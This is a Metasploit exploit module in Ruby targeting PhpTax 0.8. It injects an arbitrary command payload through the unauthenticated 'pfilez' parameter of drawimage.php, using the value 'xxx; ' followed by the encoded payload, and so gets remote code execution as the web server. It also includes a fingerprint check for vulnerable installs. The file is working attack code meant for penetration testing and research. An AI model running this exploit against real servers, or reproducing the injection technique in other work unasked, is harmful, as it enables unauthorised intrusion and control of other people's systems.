##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "PhpTax pfilez Parameter Exec Remote Code Injection",
      'Description'    => %q{
          This module exploits a vulnerability found in PhpTax, an income tax report
        generator.  When generating a PDF, the icondrawpng() function in drawimage.php
        does not properly handle the pfilez parameter, which will be used in a exec()
        statement, and then results in arbitrary remote code execution under the context
        of the web server.  Please note: authentication is not required to exploit this
        vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jean Pascal Pereira <pereira[at]secbiz.de>',
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          ['OSVDB', '86992'],
          ['EDB', '21665']
        ],
      'Payload'        =>
        {
          'Compat' =>
          {
            'ConnectionType' => 'find',
            'PayloadType'    => 'cmd',
            'RequiredCmd'    => 'generic perl ruby telnet python'
          }
        },
      'Platform'       => %w{ linux unix },
      'Targets'        =>
        [
          ['PhpTax 0.8', {}]
        ],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'DisclosureDate' => "Oct 8 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to the web application', '/phptax/'])
      ])
  end


  def check
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1,1] != '/'
    res = send_request_raw({'uri'=>uri})
    if res and res.body =~ /PHPTAX by William L\. Berggren/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end


  def exploit
    uri = target_uri.path

    print_status("#{rhost}#{rport} - Sending request...")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(uri, "drawimage.php"),
      'vars_get' => {
        'pdf'    => 'make',
        'pfilez' => "xxx; #{payload.encoded}"
      }
    })

    handler
  end
end
